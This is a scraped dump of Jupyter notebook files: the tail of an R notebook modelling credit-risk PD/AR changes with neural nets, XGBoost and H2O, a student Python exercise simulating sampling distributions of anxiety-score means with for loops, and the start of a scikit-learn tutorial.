"document_name = \"NN_AR.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
]
],
[
[
"### Error analysis - Let's look at the train error:\n\n",
"_____no_output_____"
]
],
[
[
"NN_PD_pred = as.vector(NN_PD$net.result[[1]]) #retrieve the y_hat valeus\nNN_AR_pred = as.vector(NN_AR$net.result[[1]])\n\ncat(\"RMSE train error for Delta-Logit-PD:\", round(sqrt(mean((NN_PD_pred-ABT_train_PD$y_train_PD)^2)),4), \"\\n\")\ncat(\"MAE train error for Delta-Logit-PD: \", round((mean(abs(NN_PD_pred-ABT_train_PD$y_train_PD))),4), \"\\n\",\"\\n\")\n\ncat(\"RMSE train error for Delta-Logit-AR:\", round(sqrt(mean((NN_AR_pred-ABT_train_AR$y_train_AR)^2)),4), \"\\n\")\ncat(\"MAE train error for Delta-Logit-AR: \", round((mean(abs(NN_AR_pred-ABT_train_AR$y_train_AR))),4), \"\\n\",\"\\n\")",
"RMSE train error for Delta-Logit-PD: 0.0345 \nMAE train error for Delta-Logit-PD: 0.0274 \n \nRMSE train error for Delta-Logit-AR: 0.1119 \nMAE train error for Delta-Logit-AR: 0.0725 \n \n"
]
],
[
[
"## Prediction using neural network",
"_____no_output_____"
]
],
[
[
"NN_PD_test <- compute(NN_PD,ABT_test_PD%>%select(-Date,-y_test_PD))\nNN_AR_test <- compute(NN_AR,ABT_test_AR%>%select(-Date,-y_test_AR))",
"_____no_output_____"
]
],
[
[
"### Let's look at the test error:\n",
"_____no_output_____"
]
],
[
[
"NN_PD_test_pred = as.vector(NN_PD_test$net.result) #retrieve the y_hat valeus\nNN_AR_test_pred = as.vector(NN_AR_test$net.result)\n\ncat(\"RMSE test error for Delta-Logit-PD:\", round(sqrt(mean((NN_PD_test_pred-ABT_test_PD$y_test_PD)^2)),4), \"\\n\")\ncat(\"MAE test error for Delta-Logit-PD: \", round((mean(abs(NN_PD_test_pred-ABT_test_PD$y_test_PD))),4), \"\\n\",\"\\n\")\n\ncat(\"RMSE test error for Delta-Logit-AR:\", round(sqrt(mean((NN_AR_test_pred-ABT_test_AR$y_test_AR)^2)),4), \"\\n\")\ncat(\"MAE test error for Delta-Logit-AR: \", round((mean(abs(NN_AR_test_pred-ABT_test_AR$y_test_AR))),4), \"\\n\",\"\\n\")",
"RMSE test error for Delta-Logit-PD: 0.0541 \nMAE test error for Delta-Logit-PD: 0.0444 \n \nRMSE test error for Delta-Logit-AR: 0.4162 \nMAE test error for Delta-Logit-AR: 0.2921 \n \n"
]
],
[
[
"### A first visual approach to the performance of the network and the linear model on the test set is plotted below",
"_____no_output_____"
]
],
[
[
"par(mfrow=c(2,1))\nplot(ABT_train_PD$y_train_PD,NN_PD_pred,col='red',\n main='Real vs predicted NN (train set) Delta-Logit PD',pch=18,cex=0.7, ylab = \"NN predicted\", xlab = \"actual train values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='NN_train',pch=18,col='red', bty='n')\nplot(ABT_test_PD$y_test_PD, NN_PD_test_pred,col='blue',\n main='Real vs predicted NN (test set) Delta-Logit PD',pch=18, cex=0.7, ylab = \"NN predicted\", xlab = \"actual test values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='NN_test',pch=18,col='blue', bty='n', cex=.95)\n",
"_____no_output_____"
],
[
"par(mfrow=c(2,1))\nplot(ABT_train_AR$y_train_AR,NN_AR_pred,col='red',\n main='Real vs predicted NN (train set) Delta-Logit AR',pch=18,cex=0.7, ylab = \"NN predicted\", xlab = \"actual train values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='NN_train',pch=18,col='red', bty='n')\nplot(ABT_test_AR$y_test_AR,NN_AR_test_pred,col='blue',\n main='Real vs predicted NN (test set) Delta-Logit AR',pch=18, cex=0.7, ylab = \"NN predicted\", xlab = \"actual test values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='NN_test',pch=18,col='blue', bty='n', cex=.95)",
"_____no_output_____"
]
],
[
[
"## the non-linear model for Delta-Logit-AR performs better than simply Linear Regression",
"_____no_output_____"
]
],
[
[
"mygrid <- expand.grid(.decay=c(0.5, 0.1), .size=c(1,2,3,4,5,6,7,8,9))#9features\nnnetfit <- train(y_train_AR ~ ., data=ABT_train_AR[,-1], method=\"nnet\", maxit=200, tuneGrid=mygrid, trace=F) \nprint(nnetfit)\n\n# in contrast\n\nlmfit <- train(y_train_AR ~ ., data=ABT_train_AR[,-1], method=\"lm\") \nprint(lmfit)",
"Neural Network \n\n67 samples\n 9 predictor\n\nNo pre-processing\nResampling: Bootstrapped (25 reps) \nSummary of sample sizes: 67, 67, 67, 67, 67, 67, ... \nResampling results across tuning parameters:\n\n decay size RMSE Rsquared MAE \n 0.1 1 0.1502760670 0.2975009127 0.10420669619\n 0.1 2 0.1484386750 0.2893067690 0.10287315283\n 0.1 3 0.1472826165 0.2899906728 0.10151445190\n 0.1 4 0.1462416662 0.2930703635 0.10047461087\n 0.1 5 0.1452379736 0.2986082215 0.09936393948\n 0.1 6 0.1444220741 0.3031443486 0.09854671435\n 0.1 7 0.1438096622 0.3074205280 0.09788322264\n 0.1 8 0.1432838718 0.3111209466 0.09732003799\n 0.1 9 0.1426325800 0.3154283046 0.09669090421\n 0.5 1 0.1745207195 0.3411645230 0.13373212346\n 0.5 2 0.1685845404 0.3434214571 0.12786938729\n 0.5 3 0.1648154703 0.3442762477 0.12368117712\n 0.5 4 0.1620111697 0.3450665295 0.12033264538\n 0.5 5 0.1598175517 0.3455819588 0.11761134813\n 0.5 6 0.1580492042 0.3460236928 0.11545337509\n 0.5 7 0.1565959534 0.3463774237 0.11370501675\n 0.5 8 0.1553843817 0.3466584685 0.11224455547\n 0.5 9 0.1543646567 0.3468555700 0.11100457462\n\nRMSE was used to select the optimal model using the smallest value.\nThe final values used for the model were size = 9 and decay = 0.1.\nLinear Regression \n\n67 samples\n 9 predictor\n\nNo pre-processing\nResampling: Bootstrapped (25 reps) \nSummary of sample sizes: 67, 67, 67, 67, 67, 67, ... \nResampling results:\n\n RMSE Rsquared MAE \n 0.1577663285 0.2027322481 0.1099471409\n\nTuning parameter 'intercept' was held constant at a value of TRUE\n"
]
],
[
[
"## Let's try out more heavy machinery",
"_____no_output_____"
],
[
"## XGBoost",
"_____no_output_____"
]
],
[
[
"TrainControl <- trainControl( method = \"repeatedcv\", number = 5, repeats = 4)\n\nmodel_PD<- train(y_train_PD ~ ., data=ABT_train_PD[,-1], method = \"xgbLinear\", trControl = TrainControl,verbose = FALSE)\n\nmodel_AR<- train(y_train_AR ~ ., data=ABT_train_AR[,-1], method = \"xgbLinear\", trControl = TrainControl,verbose = FALSE)",
"_____no_output_____"
],
[
"predicted_train_PD = predict(model_PD)\npredicted_train_AR = predict(model_AR)\n\ncat(\"RMSE_train error for Delta-Logit PD:\", round(sqrt(mean((predicted_train_PD - ABT_train_PD$y_train_PD)^2)),4), \"\\n\")\ncat(\"MAE_train error for Delta-Logit PD:\", round((mean(abs(predicted_train_PD - ABT_train_PD$y_train_PD))),4), \"\\n\",\"\\n\")\n\n\ncat(\"RMSE_train error for Delta-Logit AR:\", round(sqrt(mean((predicted_train_AR - ABT_train_AR$y_train_AR)^2)),4), \"\\n\")\ncat(\"MAE_train error for Delta-Logit AR: \", round((mean(abs(predicted_train_AR - ABT_train_AR$y_train_AR))),4), \"\\n\",\"\\n\")\n\npredicted_test_PD <- predict(model_PD, ABT_test_PD%>%select(-Date,-y_test_PD))\ncat(\"RMSE_test error for Delta-Logit PD: \", round(sqrt(mean((predicted_test_PD - ABT_test_PD$y_test_PD)^2)),4), \"\\n\")\ncat(\"MAE_test error for Delta-Logit PD: \", round((mean(abs(predicted_test_PD - ABT_test_PD$y_test_PD))),4), \"\\n\", \"\\n\")\n\n\npredicted_test_AR <- predict(model_AR, ABT_test_AR%>%select(-Date,-y_test_AR))\ncat(\"RMSE_test error for Delta-Logit AR: \", round(sqrt(mean((predicted_test_AR - ABT_test_AR$y_test_AR)^2)),4), \"\\n\")\ncat(\"MAE_test error for Delta-Logit AR: \", round((mean(abs(predicted_test_AR - ABT_test_AR$y_test_AR))),4), \"\\n\", \"\\n\")\n",
"RMSE_train error for Delta-Logit PD: 0.0108 \nMAE_train error for Delta-Logit PD: 0.007 \n \nRMSE_train error for Delta-Logit AR: 0.0147 \nMAE_train error for Delta-Logit AR: 0.009 \n \nRMSE_test error for Delta-Logit PD: 0.067 \nMAE_test error for Delta-Logit PD: 0.0598 \n \nRMSE_test error for Delta-Logit AR: 0.3666 \nMAE_test error for Delta-Logit AR: 0.2472 \n \n"
],
[
"par(mfrow=c(2,1))\nplot(ABT_train_PD$y_train_PD,predicted_train_PD,col='red',\n main='Real vs predicted XGBoost (train set) Delta-Logit PD',pch=18,cex=0.7, ylab = \"XGBoost predicted\", xlab = \"actual train values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='XGBoost_train',pch=18,col='red', bty='n')\nplot(ABT_test_PD$y_test_PD, predicted_test_PD,col='blue',\n main='Real vs predicted XGBoost (test set) Delta-Logit PD',pch=18, cex=0.7, ylab = \"XGBoost predicted\", xlab = \"actual test values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='XGboost_test',pch=18,col='blue', bty='n', cex=.95)\n",
"_____no_output_____"
],
[
"par(mfrow=c(2,1))\nplot(ABT_train_AR$y_train_AR,predicted_train_AR,col='red',\n main='Real vs predicted XGBoost (train set) Delta-Logit AR',pch=18,cex=0.7, ylab = \"XGBoost predicted\", xlab = \"actual train values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='XGBoost_train',pch=18,col='red', bty='n')\nplot(ABT_test_AR$y_test_AR,predicted_test_AR,col='blue',\n main='Real vs predicted XGBoost (test set) Delta-Logit AR',pch=18, cex=0.7, ylab = \"XGBoost predicted\", xlab = \"actual test values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='XGBoost_test',pch=18,col='blue', bty='n', cex=.95)",
"_____no_output_____"
],
[
"#End",
"_____no_output_____"
]
],
[
[
"# H2O",
"_____no_output_____"
],
[
"## The h2o package is a product offered by H2O.ai that contains a number of cutting edge machine learning algorithms, performance metrics, and auxiliary functions to make machine learning both powerful and easy. One of the main benefits of H2O is that it can be deployed on a cluster (this will not be discussed today). From the R perspective, there are four main uses:",
"_____no_output_____"
],
[
"1. Data Manipulation: Merging, grouping, pivoting, imputing, splitting into training/test/validation sets, etc.\n\n2. Machine Learning Algorithms: Very sophisiticated algorithms in both supervised and unsupervised categories. Supervised include deep learning (neural networks), random forest, generalized linear model, gradient boosting machine, naive bayes, stacked ensembles, and xgboost. Unsupervised include generalized low rank models, k-means and PCA. There’s also Word2vec for text analysis. The latest stable release also has AutoML: automatic machine learning, which is really cool as we’ll see in this post!\n\n3. Auxiliary ML Functionality Performance analysis and grid hyperparameter search\n\n4. Production, Map/Reduce and Cloud: Capabilities for productionizing into Java environments, cluster deployment with Hadoop / Spark (Sparkling Water), deploying in cloud environments (Azure, AWS, Databricks, etc)",
"_____no_output_____"
]
],
[
[
"ABT %>%\n ggplot(aes(Date, pre_44_CRPh_delta_LogitPD))+\n# Train Region\n annotate(\"text\", x = ymd(\"2008-12-01\"), y = 0.75,\n color = palette_light()[[1]], label = \"Train Region\")+\n# Validation Region\n geom_rect(xmin = as.numeric(ymd(\"2011-01-01\")), \n xmax = as.numeric(ymd(\"2013-12-31\")),\n ymin = -1, ymax = Inf, alpha = 0.02,\n fill = palette_light()[[3]])+\n annotate(\"text\", x = ymd(\"2012-06-01\"), y = 0.75,\n color = palette_light()[[1]], label = \"Validation\\n Region\")+\n# Test Region\n geom_rect(xmin = as.numeric(ymd(\"2014-01-01\")), \n xmax = as.numeric(ymd(\"2016-06-30\")),\n ymin = -1, ymax = Inf, alpha = 0.02,\n fill = palette_light()[[4]]) +\n annotate(\"text\", x = ymd(\"2015-03-31\"), y = 0.75,\n color = palette_light()[[1]], label = \"Test\\nRegion\") +\n# Data\n geom_line(col = palette_light()[1]) +\n geom_point(col = palette_light()[1]) +\n geom_ma(ma_fun = SMA, n = 4, size = 1) +\n# Aesthetics\n #theme_tq() +\n scale_x_date(date_breaks = \"1 year\", date_labels = \"%Y\") +\n labs(title = \"Delta Logit PD: 2007 Q3 through 2016 Q3\",\n subtitle = \"Train, Validation, and Test Sets Shown\") ",
"_____no_output_____"
],
[
"# Split into training, validation and test sets\ntrain_tbl <- ABT %>% filter(Date < \"2011-01-01\") %>% select(-contains(\"Date\"))\nvalid_tbl <- ABT %>% filter(Date > \"2010-01-01\" & Date < \"2014-01-01\")%>% select(-contains(\"Date\"))\ntest_tbl <- ABT %>% filter(Date > \"2014-01-01\")%>% select(-contains(\"Date\"))",
"_____no_output_____"
],
[
"test_tbl$pre_44_CRPh_delta_LogitPD",
"_____no_output_____"
],
[
"h2o.shutdown(prompt = TRUE)",
"_____no_output_____"
],
[
"h2o.init()",
"\nH2O is not running yet, starting it now...\n"
],
[
"# Convert to H2OFrame objects\ntrain_h2o <- as.h2o(train_tbl)\nvalid_h2o <- as.h2o(valid_tbl)\ntest_h2o <- as.h2o(test_tbl)",
" |======================================================================| 100%\n |======================================================================| 100%\n |======================================================================| 100%\n"
],
[
"# Set names for h2o\ny <- \"pre_44_CRPh_delta_LogitPD\"\nx <- setdiff(names(train_h2o), y)",
"_____no_output_____"
],
[
"#train_h2o$pre_44_CRPh_delta_LogitPD\ntrain_h2o\ntest_h2o\nvalid_h2o\n",
"_____no_output_____"
],
[
"# linear regression model used, but can use any model\nautoml_models_h2o <- h2o.automl(\n x = x, \n y = y, \n training_frame = train_h2o, \n validation_frame = valid_h2o, \n leaderboard_frame = test_h2o, \n max_runtime_secs = 10, \n stopping_metric = \"deviance\")",
" |======================================================================| 100%\n |======================================================================| 100%\n"
],
[
"# Extract leader model\nautoml_leader <- automl_models_h2o@leader",
"_____no_output_____"
],
[
"automl_leader",
"_____no_output_____"
],
[
"pred_h2o <- h2o.predict(automl_leader, newdata = test_h2o)",
" |======================================================================| 100%\n"
],
[
"print(\"Train_result\")\nh2o.performance(automl_leader)\nprint(\"Test_result\")\nh2o.performance(automl_leader, newdata = test_h2o)\n",
"[1] \"Train_result\"\n"
],
[
"fit = h2o.gbm(x = x, y = y, training_frame = train_h2o) #need at least 20 training examples...",
" |======================================================================| 100%\n"
],
[
"plot(fit)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7082cdec0c0f85cfc50f746066051f19af37908 | 139,329 | ipynb | Jupyter Notebook | tutorial012exercise.ipynb | BryanMcSp/FDS-2022-Exercises | 22ffb9aa7c77452bb800e14112ec33d13214dcc1 | [
"MIT"
] | null | null | null | tutorial012exercise.ipynb | BryanMcSp/FDS-2022-Exercises | 22ffb9aa7c77452bb800e14112ec33d13214dcc1 | [
"MIT"
] | null | null | null | tutorial012exercise.ipynb | BryanMcSp/FDS-2022-Exercises | 22ffb9aa7c77452bb800e14112ec33d13214dcc1 | [
"MIT"
] | null | null | null | 177.263359 | 27,364 | 0.905727 | [
[
[
"# In-class exercise for tutorial012\n# Loops!",
"_____no_output_____"
],
[
"## Introduction",
"_____no_output_____"
],
[
"All of what we think of as \"statistics\" is based upon repeating an experiment an infinite number of times. But rather than actually repeating the experiment, a bunch of calculus is used, plus assumptions to get the math to work. It may not seem obvious, but when we have been doing something as simple as compute the width of a sampling distribution from a set of data as *s/sqrt(n)*, what we are really saying is:\n\n\"If we were to do this experiment an infinite number of times and make a distribution of the means from all the experiments, it would be a normal distribution and have a standard deviation of s/sqrt(n). (And, by the way, this formula is based on a bunch of math that we will never actually do!)\"",
"_____no_output_____"
],
[
"One of the most important breakthroughs in statistics and data science was the realization that, with the repetition of a few simple operations (using computers), we can actually simulate experiments a \"very large\" number of times. And while it's true that \"very large\" is less then infinite, by using computers to repeat experiments many many times (say tenths of thousands), we free ourselves of the assumptions that had to made in order to get the math underlying traditional statistics to work!",
"_____no_output_____"
],
[
"But how would we simulate repeating an experiment a number of times over in code?\n\nYou guessed it... **with a `for` loop!**",
"_____no_output_____"
],
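[
"Here's the core trick in miniature (a sketch, assuming only `numpy`): a loop that \"runs\" many experiments and checks that the spread of the resulting means matches *s/sqrt(n)*.\n\n```python\nimport numpy as np\n\n# simulate 10,000 experiments, each drawing n = 100 standard-normal scores\nmeans = [np.mean(np.random.randn(100)) for _ in range(10_000)]\n\n# the standard deviation of the means should be close to s/sqrt(n) = 1/10\nprint(np.std(means))  # ~0.1\n```",
"_____no_output_____"
],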
[
"---",
"_____no_output_____"
],
[
"### Load the data set",
"_____no_output_____"
],
[
"The data come from an online test of anxiety that – according to the sketchy website – was constructed such that the anxiety scores are **normally distributed** with a **mean of 50** and a **standard deviation of 10**.",
"_____no_output_____"
],
[
"Preliminaries of course...",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt",
"_____no_output_____"
]
],
[
[
"Load the data file \"datasets/012_anxiety_data.npy\" (assuming you put the file in your \"datasets\" folder – otherwise adjust path as necessary. Reminder: `np.load()` is your friend!",
"_____no_output_____"
]
],
[
[
"df = np.load(\"datasets/012_anxiety_data.npy\")",
"_____no_output_____"
]
],
[
[
"Now let's make sure we know our data set, `real_data`, well. Let's \n\n* look at a histogram\n* ditto with a kde\n* compute the mean, median and standard deviation\n* compute the standard error of the mean\n",
"_____no_output_____"
]
],
[
[
"# histogram\nsns.displot(df, kind=\"hist\", bins = 15, alpha =0.3, color = \"red\", lw = 2)\n\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", \n Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/3208310525.py:7: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\",\n"
],
[
"# kde\nsns.kdeplot(df, fill = True, color = \"red\", lw = 3)\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Proporition of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", \n Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/1951504406.py:6: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\",\n"
],
[
"# mean, median and standard deviation\nMean = round(np.mean(df))\nMedian = round(np.median(df))\nStd = round(np.std(df))\n\nprint(\"The mean is\", Mean, \"the median is\", Median, \"and the standard deviation is\", Std)",
"The mean is 61 the median is 61 and the standard deviation is 10\n"
],
[
"# standard error\nerror = np.std(df, ddof=1) / np.sqrt(np.size(df))\n\nprint(\"The standard error is\", error)",
"The standard error is 0.9839254370533779\n"
]
],
[
[
"---",
"_____no_output_____"
],
[
"In a sentence or two of your own words, describe what the standard error of the mean is:",
"_____no_output_____"
],
[
"### The standard error of the mean is essentially the estimated variability of your sample means in context of the population mean. So if it is around 1, then we expect that our mean is within one data point of the population mean. ",
"_____no_output_____"
],
[
"---",
"_____no_output_____"
],
[
"### Simulate a bunch of experimental replications",
"_____no_output_____"
],
[
"Imagine, we wanted to simulate many many repeates of the same experiments. Fpr examp,e imagine that we wanted to appreciate the variability of the data obtained in the experiments, under certain conditions of noise and variability in the data. \n\nHow would we simulate a bunch of experiments? We obviously can't actually repeat the experiments in the real world. But, as data scientists, we do have a couple of options, both of which we can implement with `for` loops!",
"_____no_output_____"
],
[
"#### Monte Carlo Simulation",
"_____no_output_____"
],
[
"If we want to repeat the experment a bunch of times, let's consider what we know! We know that the website claims that:\n\n* the scores are normally distributed\n* they have a mean of 50\n* and a standard deviation of 10\n\nSo we should be able to use `numpy.random.randn()` to generate numbers that meet the first critereon. Then we just have to scale the standard deviation up by 10 and set the mean to 50. Luckily, we know how to multiply (`*`) and add (`+`), respectively.\n\nSo here's our mission: \n\n* write a `for` loop that repeats `n_replications = 2000` times\n* on each replication\n - compute the mean of the simulated experiment\n - store that mean in a `mc_means` numpy array\n* do a histogram of the means\n* make a kde also too\n* compute the mean and standard deviation of the 2000 means\n - compare the \"mean o' means\" from your simulation with the data mean\n - compare the \"standard deviation o' means\" with the standard error of the data",
"_____no_output_____"
],
[
"The simulation via `for` loop:",
"_____no_output_____"
]
],
[
[
"#Array info\nnRows, nCols = 2000, 1\nmyArraysize = (nRows, nCols)\nmc_means = np.zeros(myArraysize)\n\n#Basic info about our sample\nnm = 50\nnsd = 10\nn = 2000\n\nfor i in range(n): \n sample_data = nm + nsd * np.random.randn(100,1)\n current_mean = np.mean(sample_data)\n mc_means[i] = current_mean\n \nmc_means.shape",
"_____no_output_____"
]
],
[
[
"Histogram of the means:",
"_____no_output_____"
]
],
[
[
"sns.displot(df, kind=\"hist\", bins = 15, alpha =0.3, color = \"green\", lw = 2)\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/120650702.py:4: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\", Fontsize = 20)\n"
]
],
[
[
"KDE of the means",
"_____no_output_____"
]
],
[
[
"sns.displot(df, kind=\"kde\", fill = True, color = \"green\", lw = 3)\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", \n Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/2506565030.py:5: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\",\n"
]
],
[
[
"Compute the mean value of your simulation means:",
"_____no_output_____"
]
],
[
[
"sim_mean = np.mean(mc_means)\nsim_mean",
"_____no_output_____"
]
],
[
[
"Compare it with the original data mean:",
"_____no_output_____"
],
[
"### Our original data's mean was around 61, but our collection of 100 averages for 2000 samples per simulation yielded a mean of 50 (The expected mean). This seems to indicate that the claims made about the data used in the original website was signficantly flawed since it gave a mean plus 11 standard deviations (Using our calculated standard error). This seems to indicate that the mean from the population the sketchy website collected its data from is closer to 60 than the claimed mean of 50.",
"_____no_output_____"
],
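[
"To put a number on \"how far off\" the claim is (a quick sketch using the values computed above):\n\n```python\nz = (61 - 50) / 0.98  # (observed mean - claimed mean) / standard error\nprint(z)  # ~11, i.e. the observed mean is ~11 standard errors above the claim\n```",
"_____no_output_____"
],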
[
"Compute the standard deviation of your simulation means:",
"_____no_output_____"
]
],
[
[
"np.std(mc_means)",
"_____no_output_____"
]
],
[
[
"Compare it with the standard error you computed from the original data:",
"_____no_output_____"
]
],
[
[
"error",
"_____no_output_____"
]
],
[
[
"### The standard error we initally calculated utilized the central limit theorem to approximate our standard error using the standard deviation divided by the square root of the sample size. This was essentially an estimate of what we calculated with our standard deviation of our sampling distribution. This finding supports the idea that the equation used to calculate standard error is a effective way to make an estimation about our population mean from the any sample data we use. ",
"_____no_output_____"
],
[
"##### Bonus (not required)\nIf you knocked the above out with time to spare – congratulations – and let's think about this: you not only have the information given above as clues to the true state of the world. You also have:\n\n* the data themselves (or the histogram thereof that you made)\n* the actual mean of the original data\n* the actual standard deviation of the original data\n\nSo rather than do a simulation based on the claimed mean of the sketchy website, you could base a new simulation on the data you actually have!\n\nNote that, if you wrote you code reasonably well above, you should only have to change the values of two variables to do this new simulation!\n\nProceed!",
"_____no_output_____"
]
],
[
[
"#Array info\nnRows, nCols = 2000, 1\nmyArraysize = (nRows, nCols)\nmc_means = np.zeros(myArraysize)\n\n#Basic info about our sample\nbonus_nm = 60\nbonus_sd = 10\nn = 2000\n\nfor i in range(n): \n sample_data = bonus_nm + bonus_sd * np.random.randn(100,1)\n current_mean = np.mean(sample_data)\n mc_means[i] = current_mean\n \nmc_means.shape",
"_____no_output_____"
],
[
"sns.displot(df, kind=\"hist\", bins = 10, alpha =0.3, color = \"orange\", lw = 2)\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/1375256135.py:5: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\", Fontsize = 20)\n"
],
[
"sns.displot(df, kind=\"kde\", fill = True, color = \"orange\", lw = 3)\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", \n Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/2823633410.py:5: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\",\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
]
] |
e708382ce3240109520e4b6277b8b8f63ad28538 | 237,206 | ipynb | Jupyter Notebook | notebooks/02.1-Machine-Learning-Intro.ipynb | ctpham/scikit-machinelearningtutorial | c7a24b9e6515650e3dc1a949fa070093269013ca | [
"BSD-3-Clause"
] | null | null | null | notebooks/02.1-Machine-Learning-Intro.ipynb | ctpham/scikit-machinelearningtutorial | c7a24b9e6515650e3dc1a949fa070093269013ca | [
"BSD-3-Clause"
] | null | null | null | notebooks/02.1-Machine-Learning-Intro.ipynb | ctpham/scikit-machinelearningtutorial | c7a24b9e6515650e3dc1a949fa070093269013ca | [
"BSD-3-Clause"
] | null | null | null | 673.880682 | 82,775 | 0.94033 | [
[
[
"<small><i>This notebook was put together by [Jake Vanderplas](http://www.vanderplas.com). Source and license info is on [GitHub](https://github.com/jakevdp/sklearn_tutorial/).</i></small>",
"_____no_output_____"
],
[
"# Introduction to Scikit-Learn: Machine Learning with Python\n\nThis session will cover the basics of Scikit-Learn, a popular package containing a collection of tools for machine learning written in Python. See more at http://scikit-learn.org.",
"_____no_output_____"
],
[
"## Outline\n\n**Main Goal:** To introduce the central concepts of machine learning, and how they can be applied in Python using the Scikit-learn Package.\n\n- Definition of machine learning\n- Data representation in scikit-learn\n- Introduction to the Scikit-learn API",
"_____no_output_____"
],
[
"## About Scikit-Learn\n\n[Scikit-Learn](http://github.com/scikit-learn/scikit-learn) is a Python package designed to give access to **well-known** machine learning algorithms within Python code, through a **clean, well-thought-out API**. It has been built by hundreds of contributors from around the world, and is used across industry and academia.\n\nScikit-Learn is built upon Python's [NumPy (Numerical Python)](http://numpy.org) and [SciPy (Scientific Python)](http://scipy.org) libraries, which enable efficient in-core numerical and scientific computation within Python. As such, scikit-learn is not specifically designed for extremely large datasets, though there is [some work](https://github.com/ogrisel/parallel_ml_tutorial) in this area.\n\nFor this short introduction, I'm going to stick to questions of in-core processing of small to medium datasets with Scikit-learn.",
"_____no_output_____"
],
[
